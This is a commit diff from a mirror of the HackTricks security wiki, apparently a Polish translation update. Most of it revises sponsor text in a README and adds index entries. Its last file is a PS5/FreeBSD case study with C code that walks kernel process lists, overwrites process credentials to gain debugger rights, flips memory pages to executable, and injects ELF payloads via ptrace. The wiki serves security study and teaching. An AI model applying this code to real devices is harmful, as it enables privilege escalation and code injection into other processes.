maride/hacktricks
1
0
Fork 0
mirror of https://github.com/HackTricks-wiki/hacktricks.git synced 2025-10-10 18:36:50 +00:00
Code Issues Packages Projects Releases Wiki Activity

Translated ['src/generic-hacking/exfiltration.md', 'src/network-services

Browse Source
This commit is contained in:
Translator 2025-09-30 22:43:48 +00:00
parent 656dca9d39
commit e7bd6dee03
20 changed files with 2071 additions and 881 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

1
searchindex.js
View File

File diff suppressed because one or more lines are too long

110
src/README.md
View File

@ -2,7 +2,7 @@
<figure><img src="images/hacktricks.gif" alt=""><figcaption></figcaption></figure>
_Logotypy i projektowanie ruchu Hacktricks autorstwa_ [_@ppieranacho_](https://www.instagram.com/ppieranacho/)_._
_Hacktricks logo i motion design autorstwa_ [_@ppieranacho_](https://www.instagram.com/ppieranacho/)_._
### Uruchom HackTricks lokalnie
```bash
@ -31,7 +31,7 @@ export LANG="master" # Leave master for english
# Run the docker container indicating the path to the hacktricks folder
docker run -d --rm --platform linux/amd64 -p 3337:3000 --name hacktricks -v $(pwd)/hacktricks:/app ghcr.io/hacktricks-wiki/hacktricks-cloud/translator-image bash -c "mkdir -p ~/.ssh && ssh-keyscan -H github.com >> ~/.ssh/known_hosts && cd /app && git config --global --add safe.directory /app && git checkout $LANG && git pull && MDBOOK_PREPROCESSOR__HACKTRICKS__ENV=dev mdbook serve --hostname 0.0.0.0"
```
Twoja lokalna kopia HackTricks będzie **dostępna pod adresem [http://localhost:3337](http://localhost:3337)** po <5 minutach (musi zbudować książkę, bądź cierpliwy).
Twoja lokalna kopia HackTricks będzie **dostępna pod [http://localhost:3337](http://localhost:3337)** po mniej niż 5 minut (musi zbudować książkę, bądź cierpliwy).
## Sponsorzy korporacyjni
@ -39,11 +39,11 @@ Twoja lokalna kopia HackTricks będzie **dostępna pod adresem [http://localhost
<figure><img src="images/stm (1).png" alt=""><figcaption></figcaption></figure>
[**STM Cyber**](https://www.stmcyber.com) to świetna firma zajmująca się cyberbezpieczeństwem, której hasło to **HACK THE UNHACKABLE**. Prowadzą własne badania i opracowują własne narzędzia hakerskie, aby **oferować kilka cennych usług w zakresie cyberbezpieczeństwa**, takich jak pentesting, Red teams i szkolenia.
[**STM Cyber**](https://www.stmcyber.com) to świetna firma zajmująca się cyberbezpieczeństwem, której slogan to **HACK THE UNHACKABLE**. Prowadzą własne badania i rozwijają własne narzędzia do hackowania, aby **oferować wiele wartościowych usług związanych z cyberbezpieczeństwem** takich jak pentesting, Red teams i szkolenia.
Możesz sprawdzić ich **blog** pod adresem [**https://blog.stmcyber.com**](https://blog.stmcyber.com)
Możesz sprawdzić ich **blog** na [**https://blog.stmcyber.com**](https://blog.stmcyber.com)
**STM Cyber** wspiera również projekty open source w dziedzinie cyberbezpieczeństwa, takie jak HackTricks :)
**STM Cyber** wspiera również projekty open source związane z cyberbezpieczeństwem, takie jak HackTricks :)
---
@ -51,7 +51,7 @@ Możesz sprawdzić ich **blog** pod adresem [**https://blog.stmcyber.com**](http
<figure><img src="images/image (45).png" alt=""><figcaption></figcaption></figure>
[**RootedCON**](https://www.rootedcon.com) to najważniejsze wydarzenie związane z cyberbezpieczeństwem w **Hiszpanii** i jedno z najważniejszych w **Europie**. Z **misją promowania wiedzy technicznej**, ten kongres jest gorącym punktem spotkań dla profesjonalistów z dziedziny technologii i cyberbezpieczeństwa w każdej dyscyplinie.
[**RootedCON**](https://www.rootedcon.com) to najważniejsze wydarzenie związane z cyberbezpieczeństwem w **Hiszpanii** i jedno z najistotniejszych w **Europie**. Z misją promowania wiedzy technicznej, ten kongres jest gorącym punktem spotkań dla profesjonalistów z dziedziny technologii i cyberbezpieczeństwa ze wszystkich dyscyplin.
{{#ref}}
https://www.rootedcon.com/
@ -63,9 +63,9 @@ https://www.rootedcon.com/
<figure><img src="images/image (47).png" alt=""><figcaption></figcaption></figure>
**Intigriti** to **numer 1 w Europie** w zakresie etycznego hackingu i **platforma bug bounty.**
**Intigriti** to europejska platforma nr 1 w zakresie ethical hacking i **bug bounty platform.**
**Wskazówka dotycząca bug bounty**: **zarejestruj się** w **Intigriti**, premium **platformie bug bounty stworzonej przez hakerów, dla hackerów**! Dołącz do nas pod adresem [**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks) już dziś i zacznij zarabiać nagrody do **100 000 USD**!
**Bug bounty tip**: **zarejestruj się** na **Intigriti**, premium **bug bounty platform created by hackers, for hackers**! Dołącz do nas na [**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks) już dziś i zacznij zarabiać nagrody do **$100,000**!
{{#ref}}
https://go.intigriti.com/hacktricks
@ -78,7 +78,7 @@ https://go.intigriti.com/hacktricks
<figure><img src="images/image (48).png" alt=""><figcaption></figcaption></figure>
\
Użyj [**Trickest**](https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks), aby łatwo budować i **automatyzować przepływy pracy** zasilane przez **najbardziej zaawansowane** narzędzia społecznościowe na świecie.
Użyj [**Trickest**](https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks), aby łatwo budować i **automatyzować workflowy** napędzane przez najbardziej **zaawansowane** narzędzia społecznościowe na świecie.
Uzyskaj dostęp już dziś:
@ -92,23 +92,23 @@ https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktr
<figure><img src="images/image (3).png" alt=""><figcaption></figcaption></figure>
Dołącz do serwera [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy), aby komunikować się z doświadczonymi hakerami i łowcami bugów!
Dołącz do [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) server, aby komunikować się z doświadczonymi hackerami i łowcami bug bounty!
- **Wgląd w hacking:** Angażuj się w treści, które zagłębiają się w emocje i wyzwania związane z hackingiem
- **Aktualności o hackingu w czasie rzeczywistym:** Bądź na bieżąco z dynamicznym światem hackingu dzięki aktualnym wiadomościom i wglądom
- **Najnowsze ogłoszenia:** Bądź na bieżąco z nowymi nagrodami bug bounty i istotnymi aktualizacjami platformy
- **Wglądy dotyczące hackingu:** Angażuj się w treści zgłębiające emocje i wyzwania hackingowe
- **Wiadomości o hackingu w czasie rzeczywistym:** Bądź na bieżąco z szybkim tempem świata hackingu dzięki wiadomościom i analizom w czasie rzeczywistym
- **Najnowsze ogłoszenia:** Informacje o najnowszych uruchamianych bug bounty i kluczowych aktualizacjach platformy
**Dołącz do nas na** [**Discord**](https://discord.com/invite/N3FrSbmwdy) i zacznij współpracować z najlepszymi hakerami już dziś!
**Dołącz do nas na** [**Discord**](https://discord.com/invite/N3FrSbmwdy) i zacznij współpracować z najlepszymi hackerami już dziś!
---
### [Pentest-Tools.com](https://pentest-tools.com/?utm_term=jul2024&utm_medium=link&utm_source=hacktricks&utm_campaign=spons) - Niezbędne narzędzie do testów penetracyjnych
### [Pentest-Tools.com](https://pentest-tools.com/?utm_term=jul2024&utm_medium=link&utm_source=hacktricks&utm_campaign=spons) - The essential penetration testing toolkit
<figure><img src="images/pentest-tools.svg" alt=""><figcaption></figcaption></figure>
**Uzyskaj perspektywę hakera na swoje aplikacje internetowe, sieć i chmurę**
**Zyskaj perspektywę hackera na swoje aplikacje webowe, sieć i chmurę**
**Znajdź i zgłoś krytyczne, wykorzystywalne luki z rzeczywistym wpływem na biznes.** Użyj naszych 20+ niestandardowych narzędzi, aby zmapować powierzchnię ataku, znaleźć problemy z bezpieczeństwem, które pozwalają na eskalację uprawnień, i użyj zautomatyzowanych exploitów, aby zebrać niezbędne dowody, przekształcając swoją ciężką pracę w przekonujące raporty.
**Znajdź i zgłoś krytyczne, eksploatowalne podatności mające realny wpływ na biznes.** Użyj naszych 20+ dedykowanych narzędzi do mapowania powierzchni ataku, znajdowania problemów bezpieczeństwa umożliwiających eskalację uprawnień oraz używania zautomatyzowanych exploitów do zebrania kluczowych dowodów, przekształcając twoją pracę w przekonujące raporty.
{{#ref}}
https://pentest-tools.com/?utm_term=jul2024&utm_medium=link&utm_source=hacktricks&utm_campaign=spons
@ -120,22 +120,22 @@ https://pentest-tools.com/?utm_term=jul2024&utm_medium=link&utm_source=hacktrick
<figure><img src="images/image (1254).png" alt=""><figcaption></figcaption></figure>
**SerpApi** oferuje szybkie i łatwe API w czasie rzeczywistym do **uzyskiwania wyników wyszukiwania**. Zbierają dane z wyszukiwarek, obsługują proxy, rozwiązują captchy i analizują wszystkie bogate dane strukturalne za Ciebie.
**SerpApi** oferuje szybkie i proste API w czasie rzeczywistym do **dostępu do wyników wyszukiwarek**. Zeskrobują wyszukiwarki, obsługują proxy, rozwiązują captche i parsują wszystkie bogate, ustrukturyzowane dane za Ciebie.
Subskrypcja jednego z planów SerpApi obejmuje dostęp do ponad 50 różnych API do zbierania danych z różnych wyszukiwarek, w tym Google, Bing, Baidu, Yahoo, Yandex i innych.\
W przeciwieństwie do innych dostawców, **SerpApi nie tylko zbiera organiczne wyniki**. Odpowiedzi SerpApi konsekwentnie zawierają wszystkie reklamy, obrazy i filmy inline, grafy wiedzy oraz inne elementy i funkcje obecne w wynikach wyszukiwania.
Subskrypcja jednego z planów SerpApi obejmuje dostęp do ponad 50 różnych API do zeskrobywania różnych wyszukiwarek, w tym Google, Bing, Baidu, Yahoo, Yandex i innych.\
W przeciwieństwie do innych dostawców, **SerpApi nie ogranicza się jedynie do zeskrobywania wyników organicznych**. Odpowiedzi SerpApi konsekwentnie zawierają wszystkie reklamy, osadzone obrazy i wideo, knowledge graphy oraz inne elementy i funkcje obecne w wynikach wyszukiwania.
Obecni klienci SerpApi to **Apple, Shopify i GrubHub**.\
Aby uzyskać więcej informacji, sprawdź ich [**blog**](https://serpapi.com/blog/)**,** lub wypróbuj przykład w ich [**playground**](https://serpapi.com/playground)**.**\
Możesz **utworzyć darmowe konto** [**tutaj**](https://serpapi.com/users/sign_up)**.**
Więcej informacji znajdziesz na ich [**blogu**](https://serpapi.com/blog/)**,** lub wypróbuj przykład w ich [**playground**](https://serpapi.com/playground)**.**\
Możesz **założyć darmowe konto** [**tutaj**](https://serpapi.com/users/sign_up)**.**
---
### [8kSec Academy Dogłębne kursy bezpieczeństwa mobilnego](https://academy.8ksec.io/)
### [8kSec Academy In-Depth Mobile Security Courses](https://academy.8ksec.io/)
<figure><img src="images/image (2).png" alt=""><figcaption></figcaption></figure>
Poznaj technologie i umiejętności potrzebne do przeprowadzania badań nad lukami, testów penetracyjnych i inżynierii odwrotnej, aby chronić aplikacje i urządzenia mobilne. **Opanuj bezpieczeństwo iOS i Android** dzięki naszym kursom na żądanie i **zdobądź certyfikat**:
Poznaj technologie i umiejętności niezbędne do prowadzenia researchu podatności, penetration testing i reverse engineeringu, aby chronić aplikacje mobilne i urządzenia. **Opanuj bezpieczeństwo iOS i Android** dzięki naszym kursom ondemand i **uzyskaj certyfikat**:
{{#ref}}
https://academy.8ksec.io/
@ -147,13 +147,13 @@ https://academy.8ksec.io/
<figure><img src="images/websec (1).svg" alt=""><figcaption></figcaption></figure>
[**WebSec**](https://websec.net) to profesjonalna firma zajmująca się cyberbezpieczeństwem z siedzibą w **Amsterdamie**, która pomaga **chronić** firmy **na całym świecie** przed najnowszymi zagrożeniami w dziedzinie cyberbezpieczeństwa, oferując **usługi ofensywne** z **nowoczesnym** podejściem.
[**WebSec**](https://websec.net) to profesjonalna firma zajmująca się cyberbezpieczeństwem z siedzibą w **Amsterdamie**, która pomaga **chronić** firmy **na całym świecie** przed najnowszymi zagrożeniami, dostarczając **offensive-security services** z **nowoczesnym** podejściem.
WebSec to międzynarodowa firma zajmująca się bezpieczeństwem z biurami w Amsterdamie i Wyoming. Oferują **wszystko w jednym** usługi bezpieczeństwa, co oznacza, że robią wszystko; Pentesting, **Audyty** Bezpieczeństwa, Szkolenia w zakresie Świadomości, Kampanie Phishingowe, Przegląd Kodów, Rozwój Exploitów, Outsourcing Ekspertów ds. Bezpieczeństwa i wiele więcej.
WebSec to międzynarodowa firma security z biurami w Amsterdamie i Wyoming. Oferują **usługi all-in-one**, co oznacza, że robią wszystko: Pentesting, **Security** Audyty, szkolenia świadomościowe, kampanie phishingowe, Code Review, rozwój exploitów, outsourcing ekspertów ds. bezpieczeństwa i wiele więcej.
Kolejną fajną rzeczą w WebSec jest to, że w przeciwieństwie do średniej w branży, WebSec jest **bardzo pewny swoich umiejętności**, do tego stopnia, że **gwarantują najlepsze wyniki jakościowe**, jak stwierdzają na swojej stronie "**Jeśli nie możemy tego zhakować, nie płacisz!**". Aby uzyskać więcej informacji, zajrzyj na ich [**stronę**](https://websec.net/en/) i [**blog**](https://websec.net/blog/)!
Kolejną fajną rzeczą w WebSec jest to, że w przeciwieństwie do średniej rynkowej, WebSec jest **bardzo pewny swoich umiejętności**, do tego stopnia, że **gwarantują najlepsze wyniki jakościowe**, jak napisano na ich stronie "**If we can't hack it, You don't pay it!**". Po więcej informacji zajrzyj na ich [**website**](https://websec.net/en/) i [**blog**](https://websec.net/blog/)!
Oprócz powyższego, WebSec jest również **zaangażowanym sponsorem HackTricks.**
Ponadto WebSec jest również **zaangażowanym sponsorem HackTricks.**
{{#ref}}
https://www.youtube.com/watch?v=Zq2JycGDCPM
@ -166,9 +166,9 @@ https://www.youtube.com/watch?v=Zq2JycGDCPM
<figure><img src="images/venacus-logo.svg" alt="venacus logo"><figcaption></figcaption></figure>
[**Venacus**](https://venacus.com/?utm_medium=link&utm_source=hacktricks&utm_campaign=spons) to wyszukiwarka naruszeń danych (leak). \
Oferujemy wyszukiwanie losowych ciągów (jak google) w różnych typach wycieków danych, dużych i małych --nie tylko tych dużych-- z danych z wielu źródeł. \
Wyszukiwanie osób, wyszukiwanie AI, wyszukiwanie organizacji, dostęp do API (OpenAPI), integracja z theHarvester, wszystkie funkcje, których potrzebuje pentester.\
**HackTricks nadal jest wspaniałą platformą edukacyjną dla nas wszystkich i jesteśmy dumni, że możemy ją sponsorować!**
Oferujemy wyszukiwanie losowych ciągów (jak google) we wszystkich rodzajach data leaks, dużych i małych -- nie tylko tych największych -- na danych z wielu źródeł. \
Wyszukiwanie osób, wyszukiwanie AI, wyszukiwanie organizacji, dostęp API (OpenAPI), integracja theHarvester, wszystkie funkcje, których potrzebuje pentester.\
**HackTricks wciąż pozostaje świetną platformą edukacyjną dla nas wszystkich i jesteśmy dumni, że ją sponsorujemy!**
{{#ref}}
https://venacus.com/?utm_medium=link&utm_source=hacktricks&utm_campaign=spons
@ -180,16 +180,14 @@ https://venacus.com/?utm_medium=link&utm_source=hacktricks&utm_campaign=spons
<figure><img src="images/cyberhelmets-logo.png" alt="cyberhelmets logo"><figcaption></figcaption></figure>
**Stworzony dla terenu. Stworzony wokół Ciebie.**\
[**Cyber Helmets**](https://cyberhelmets.com/?ref=hacktricks) opracowuje i dostarcza skuteczne szkolenia w zakresie cyberbezpieczeństwa, które są prowadzone przez
ekspertów branżowych. Ich programy wykraczają poza teorię, aby wyposażyć zespoły w głębokie
zrozumienie i praktyczne umiejętności, korzystając z niestandardowych środowisk, które odzwierciedlają rzeczywiste
zagrożenia. W przypadku zapytań dotyczących niestandardowego szkolenia, skontaktuj się z nami [**tutaj**](https://cyberhelmets.com/tailor-made-training/?ref=hacktricks).
**Co wyróżnia ich szkolenie:**
* Niestandardowe treści i laboratoria
**Built for the field. Built around you.**\
[**Cyber Helmets**](https://cyberhelmets.com/?ref=hacktricks) tworzy i dostarcza efektywne szkolenia z cyberbezpieczeństwa budowane i prowadzone przez ekspertów z branży. Ich programy wykraczają poza teorię, wyposażając zespoły w dogłębną wiedzę i praktyczne umiejętności, korzystając z niestandardowych środowisk odzwierciedlających rzeczywiste zagrożenia. W sprawach szkoleń niestandardowych skontaktuj się z nami [**tutaj**](https://cyberhelmets.com/tailor-made-training/?ref=hacktricks).
**Co wyróżnia ich szkolenia:**
* Treść i laboratoria tworzone na zamówienie
* Wsparcie przez narzędzia i platformy najwyższej klasy
* Zaprojektowane i prowadzone przez praktyków
* Projektowane i prowadzone przez praktyków
{{#ref}}
https://cyberhelmets.com/courses/?ref=hacktricks
@ -201,18 +199,13 @@ https://cyberhelmets.com/courses/?ref=hacktricks
<figure><img src="images/lasttower.png" alt="lasttower logo"><figcaption></figcaption></figure>
Last Tower Solutions dostarcza specjalistyczne usługi w zakresie cyberbezpieczeństwa dla instytucji **Edukacyjnych** i **FinTech**,
koncentrując się na **testach penetracyjnych, ocenach bezpieczeństwa w chmurze** oraz
**gotowości do zgodności** (SOC 2, PCI-DSS, NIST). Nasz zespół składa się z **profesjonalistów z certyfikatami OSCP i CISSP**,
przynosząc głęboką wiedzę techniczną i standardowe wglądy branżowe do każdego zlecenia.
Last Tower Solutions dostarcza wyspecjalizowane usługi cyberbezpieczeństwa dla instytucji edukacyjnych i FinTech, z naciskiem na **penetration testing, oceny bezpieczeństwa chmury** oraz **przygotowanie do zgodności** (SOC 2, PCI-DSS, NIST). Nasz zespół obejmuje profesjonalistów z certyfikatami **OSCP i CISSP**, dostarczając głęboką wiedzę techniczną i wgląd zgodny ze standardami branżowymi w każdym zaangażowaniu.
Przechodzimy poza automatyczne skany, oferując **ręczne, oparte na wywiadzie testy** dostosowane do
środowisk o wysokim ryzyku. Od zabezpieczania danych studentów po ochronę transakcji finansowych,
pomagamy organizacjom bronić tego, co najważniejsze.
Wykraczamy poza automatyczne skany dzięki **ręcznym, opartym na wywiadzie testom**, dostosowanym do środowisk o wysokim ryzyku. Od zabezpieczania danych studentów po ochronę transakcji finansowych, pomagamy organizacjom chronić to, co najważniejsze.
_„Jakościowa obrona wymaga znajomości ataku, zapewniamy bezpieczeństwo poprzez zrozumienie.”_
_„Jako obrona wymaga znajomości ofensywy, dostarczamy bezpieczeństwo poprzez zrozumienie.”_
Bądź na bieżąco z najnowszymi informacjami w dziedzinie cyberbezpieczeństwa, odwiedzając nasz [**blog**](https://www.lasttowersolutions.com/blog).
Bądź na bieżąco z najnowszymi informacjami z zakresu cyberbezpieczeństwa, odwiedzając ich [**blog**](https://www.lasttowersolutions.com/blog).
{{#ref}}
https://www.lasttowersolutions.com/
@ -220,7 +213,22 @@ https://www.lasttowersolutions.com/
---
## Licencja i zastrzeżenie
### [K8Studio - The Smarter GUI to Manage Kubernetes.](https://k8studio.io/)
<figure><img src="images/k8studio.png" alt="k8studio logo"><figcaption></figcaption></figure>
K8Studio IDE umożliwia DevOps, DevSecOps i deweloperom zarządzanie, monitorowanie i zabezpieczanie klastrów Kubernetes w efektywny sposób. Wykorzystaj nasze AI-driven wnioski, zaawansowany framework bezpieczeństwa i intuicyjne CloudMaps GUI, aby wizualizować swoje klastry, rozumieć ich stan i działać z pewnością.
Co więcej, K8Studio jest **kompatybilne ze wszystkimi głównymi dystrybucjami kubernetes** (AWS, GCP, Azure, DO, Rancher, K3s, Openshift i inne).
{{#ref}}
https://k8studio.io/
{{#endref}}
---
## License & Disclaimer
Sprawdź je w:
@ -228,8 +236,8 @@ Sprawdź je w:
welcome/hacktricks-values-and-faq.md
{{#endref}}
## Statystyki Github
## Github Stats
![Statystyki Github HackTricks](https://repobeats.axiom.co/api/embed/68f8746802bcf1c8462e889e6e9302d4384f164b.svg)
![HackTricks Github Stats](https://repobeats.axiom.co/api/embed/68f8746802bcf1c8462e889e6e9302d4384f164b.svg)
{{#include ./banners/hacktricks-training.md}}

6
src/SUMMARY.md
View File

@ -59,6 +59,7 @@
- [Decompile compiled python binaries (exe, elf) - Retreive from .pyc](generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/.pyc.md)
- [Browser Artifacts](generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/browser-artifacts.md)
- [Deofuscation vbs (cscript.exe)](generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/desofuscation-vbs-cscript.exe.md)
- [Discord Cache Forensics](generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/discord-cache-forensics.md)
- [Local Cloud Storage](generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/local-cloud-storage.md)
- [Office file analysis](generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/office-file-analysis.md)
- [PDF File analysis](generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/pdf-file-analysis.md)
@ -82,6 +83,7 @@
- [Basic Python](generic-methodologies-and-resources/python/basic-python.md)
- [Threat Modeling](generic-methodologies-and-resources/threat-modeling.md)
- [Blockchain & Crypto](blockchain/blockchain-and-crypto-currencies/README.md)
- [Mutation Testing With Slither](blockchain/smart-contract-security/mutation-testing-with-slither.md)
- [Defi/AMM Hook Precision](blockchain/blockchain-and-crypto-currencies/defi-amm-hook-precision.md)
- [Lua Sandbox Escape](generic-methodologies-and-resources/lua/bypass-lua-sandboxes/README.md)
@ -102,6 +104,7 @@
# 🐧 Linux Hardening
- [Linux Basics](linux-hardening/linux-basics.md)
- [Checklist - Linux Privilege Escalation](linux-hardening/linux-privilege-escalation-checklist.md)
- [Linux Privilege Escalation](linux-hardening/privilege-escalation/README.md)
- [Android Rooting Frameworks Manager Auth Bypass Syscall Hook](linux-hardening/privilege-escalation/android-rooting-frameworks-manager-auth-bypass-syscall-hook.md)
@ -570,6 +573,7 @@
- [15672 - Pentesting RabbitMQ Management](network-services-pentesting/15672-pentesting-rabbitmq-management.md)
- [24007,24008,24009,49152 - Pentesting GlusterFS](network-services-pentesting/24007-24008-24009-49152-pentesting-glusterfs.md)
- [27017,27018 - Pentesting MongoDB](network-services-pentesting/27017-27018-mongodb.md)
- [32100 Udp - Pentesting Pppp Cs2 P2p Cameras](network-services-pentesting/32100-udp-pentesting-pppp-cs2-p2p-cameras.md)
- [44134 - Pentesting Tiller (Helm)](network-services-pentesting/44134-pentesting-tiller-helm.md)
- [44818/UDP/TCP - Pentesting EthernetIP](network-services-pentesting/44818-ethernetip.md)
- [47808/udp - Pentesting BACNet](network-services-pentesting/47808-udp-bacnet.md)
@ -587,6 +591,7 @@
- [BrowExt - ClickJacking](pentesting-web/browser-extension-pentesting-methodology/browext-clickjacking.md)
- [BrowExt - permissions & host_permissions](pentesting-web/browser-extension-pentesting-methodology/browext-permissions-and-host_permissions.md)
- [BrowExt - XSS Example](pentesting-web/browser-extension-pentesting-methodology/browext-xss-example.md)
- [Forced Extension Load Preferences Mac Forgery Windows](pentesting-web/browser-extension-pentesting-methodology/forced-extension-load-preferences-mac-forgery-windows.md)
- [Bypass Payment Process](pentesting-web/bypass-payment-process.md)
- [Captcha Bypass](pentesting-web/captcha-bypass.md)
- [Cache Poisoning and Cache Deception](pentesting-web/cache-deception/README.md)
@ -843,6 +848,7 @@
- [WWW2Exec - \_\_malloc_hook & \_\_free_hook](binary-exploitation/arbitrary-write-2-exec/aw2exec-__malloc_hook.md)
- [Common Exploiting Problems](binary-exploitation/common-exploiting-problems.md)
- [Linux kernel exploitation - toctou](binary-exploitation/linux-kernel-exploitation/posix-cpu-timers-toctou-cve-2025-38352.md)
- [PS5 compromission](binary-exploitation/freebsd-ptrace-rfi-vm_map-prot_exec-bypass-ps5.md)
- [Windows Exploiting (Basic Guide - OSCP lvl)](binary-exploitation/windows-exploiting-basic-guide-oscp-lvl.md)
- [iOS Exploiting](binary-exploitation/ios-exploiting/README.md)
- [ios CVE-2020-27950-mach_msg_trailer_t](binary-exploitation/ios-exploiting/CVE-2020-27950-mach_msg_trailer_t.md)

183
src/binary-exploitation/freebsd-ptrace-rfi-vm_map-prot_exec-bypass-ps5.md Normal file
View File

@ -0,0 +1,183 @@
# FreeBSD ptrace RFI and vm_map PROT_EXEC bypass (PS5 case study)
{{#include ../banners/hacktricks-training.md}}
## Overview
Ta strona dokumentuje praktyczną technikę iniekcji procesu/ELF w trybie użytkownika Unix/BSD na PlayStation 5 (PS5), która oparta jest na FreeBSD. Metoda uogólnia się na pochodne FreeBSD, gdy już posiadasz kernel read/write (R/W) primitives. W skrócie:
- Zmodyfikuj bieżące poświadczenia procesu (ucred), aby nadać uprawnienia debuggera, umożliwiając ptrace/mdbg na dowolnych procesach użytkownika.
- Znajdź procesy docelowe, przeglądając listę allproc w jądrze.
- Obejście ograniczeń PROT_EXEC przez ustawienie vm_map_entry.protection |= PROT_EXEC w vm_map procesu docelowego za pomocą zapisów do pamięci jądra.
- Użyj ptrace do wykonania Remote Function Invocation (RFI): zawieś wątek, ustaw rejestry, aby wywołać dowolne funkcje wewnątrz celu, wznowienie, zbierz wartości zwrotne i przywróć stan.
- Zmapuj i uruchom dowolne payloady ELF wewnątrz procesu docelowego używając in-process ELF loadera, następnie uruchom dedykowany wątek wykonujący twój payload i wywołujący breakpoint, aby się czysto odłączyć.
PS5 hypervisor mitigations warte odnotowania (sformułowane w kontekście tej techniki):
- XOM (execute-only .text) uniemożliwia odczyt/zapis .text jądra.
- Wyczyszczenie CR0.WP lub wyłączenie CR4.SMEP powoduje hypervisor vmexit (crash). Tylko zapisy do danych jądra są wykonalne.
- Userland mmap jest domyślnie ograniczony do PROT_READ|PROT_WRITE. Przyznanie PROT_EXEC musi być zrobione przez edycję wpisów vm_map w pamięci jądra.
Ta technika jest post-exploitation: zakłada istnienie kernel R/W primitives uzyskanych w chainie exploita. Publiczne payloady demonstrują to do firmware 10.01 w momencie pisania.
## Kernel data-only primitives
### Process discovery via allproc
FreeBSD utrzymuje dwukierunkową listę procesów w kernel .data pod allproc. Mając kernel read primitive, iteruj ją, aby zlokalizować nazwy procesów i PIDs:
```c
struct proc* find_proc_by_name(const char* proc_name){
uint64_t next = 0;
kernel_copyout(KERNEL_ADDRESS_ALLPROC, &next, sizeof(uint64_t)); // list head
struct proc* proc = malloc(sizeof(struct proc));
do{
kernel_copyout(next, (void*)proc, sizeof(struct proc)); // read entry
if (!strcmp(proc->p_comm, proc_name)) return proc;
kernel_copyout(next, &next, sizeof(uint64_t)); // advance next
} while (next);
free(proc);
return NULL;
}
void list_all_proc_and_pid(){
uint64_t next = 0;
kernel_copyout(KERNEL_ADDRESS_ALLPROC, &next, sizeof(uint64_t));
struct proc* proc = malloc(sizeof(struct proc));
do{
kernel_copyout(next, (void*)proc, sizeof(struct proc));
printf("%s - %d\n", proc->p_comm, proc->pid);
kernel_copyout(next, &next, sizeof(uint64_t));
} while (next);
free(proc);
}
```
Notatki:
- KERNEL_ADDRESS_ALLPROC jest zależny od firmware.
- p_comm to nazwa o stałej długości; rozważ wyszukiwania pid->proc w razie potrzeby.
### Podnieś poświadczenia do debugowania (ucred)
Na PS5 struct ucred zawiera pole Authority ID dostępne przez proc->p_ucred. Zapisanie wartości Authority ID odpowiadającej debuggerowi przyznaje ptrace/mdbg nad innymi procesami:
```c
void set_ucred_to_debugger(){
struct proc* proc = get_proc_by_pid(getpid());
if (proc){
uintptr_t authid = 0; // read current (optional)
uintptr_t ptrace_authid = 0x4800000000010003ULL; // debugger Authority ID
kernel_copyout((uintptr_t)proc->p_ucred + 0x58, &authid, sizeof(uintptr_t));
kernel_copyin(&ptrace_authid, (uintptr_t)proc->p_ucred + 0x58, sizeof(uintptr_t));
free(proc);
}
}
```
- Offset 0x58 jest specyficzny dla rodziny firmware PS5 i musi być zweryfikowany dla każdej wersji.
- Po tym zapisie injector może przyłączyć się i instrumentować procesy użytkownika za pomocą ptrace/mdbg.
## Omijanie mapowań użytkownika tylko RW: vm_map PROT_EXEC flip
Userland mmap może być ograniczony do PROT_READ|PROT_WRITE. FreeBSD śledzi przestrzeń adresową procesu w vm_map z węzłami vm_map_entry (BST plus lista). Każdy wpis zawiera pola protection i max_protection:
```c
struct vm_map_entry {
struct vm_map_entry *prev,*next,*left,*right;
vm_offset_t start, end, avail_ssize;
vm_size_t adj_free, max_free;
union vm_map_object object; vm_ooffset_t offset; vm_eflags_t eflags;
vm_prot_t protection; vm_prot_t max_protection; vm_inherit_t inheritance;
int wired_count; vm_pindex_t lastr;
};
```
Mając kernel R/W możesz zlokalizować targets vm_map i ustawić entry->protection |= PROT_EXEC (a w razie potrzeby entry->max_protection). Uwagi praktyczne dotyczące implementacji:
- Przechodź wpisy albo liniowo przez next, albo używając balanced-tree (left/right) dla wyszukiwania po zakresie adresów w O(log n).
- Wybierz znany region RW, którym zarządzasz (scratch buffer lub mapped file) i dodaj PROT_EXEC, aby móc stageować kod lub loader thunki.
- Kod PS5 SDK dostarcza helpery do szybkiego map-entry lookup i przełączania protekcji.
To omija userlands mmap policy przez bezpośrednią edycję kernel-owned metadata.
## Remote Function Invocation (RFI) with ptrace
FreeBSD nie ma Windows-owego VirtualAllocEx/CreateRemoteThread. Zamiast tego wymuszasz, aby target wywołał funkcje wewnątrz siebie pod kontrolą ptrace:
1. Attachnij się do targetu i wybierz wątek; może mieć zastosowanie PTRACE_ATTACH lub PS5-specific mdbg flows.
2. Zapisz kontekst wątku: registers, PC, SP, flags.
3. Zapisz argument registers zgodnie z ABI (x86_64 SysV lub arm64 AAPCS64), ustaw PC na docelową funkcję i opcjonalnie umieść dodatkowe args/stack według potrzeby.
4. Wykonuj single-step lub kontynuuj aż do kontrolowanego stopu (np. software breakpoint lub sygnał), potem odczytaj wartości zwracane z regs.
5. Przywróć oryginalny kontekst i kontynuuj.
Use cases:
- Call into an in-process ELF loader (e.g., elfldr_load) with a pointer to your ELF image in target memory.
- Invoke helper routines to fetch returned entrypoints and payload-args pointers.
Example of driving the ELF loader:
```c
intptr_t entry = elfldr_load(target_pid, (uint8_t*)elf_in_target);
intptr_t args = elfldr_payload_args(target_pid);
printf("[+] ELF entrypoint: %#02lx\n[+] Payload Args: %#02lx\n", entry, args);
```
Loader mapuje segmenty, rozwiązuje imports, stosuje relocations i zwraca punkt wejścia (często CRT bootstrap) oraz nieprzezroczysty wskaźnik payload_args, który Twój stager przekazuje do payloads main().
## Threaded stager and clean detach
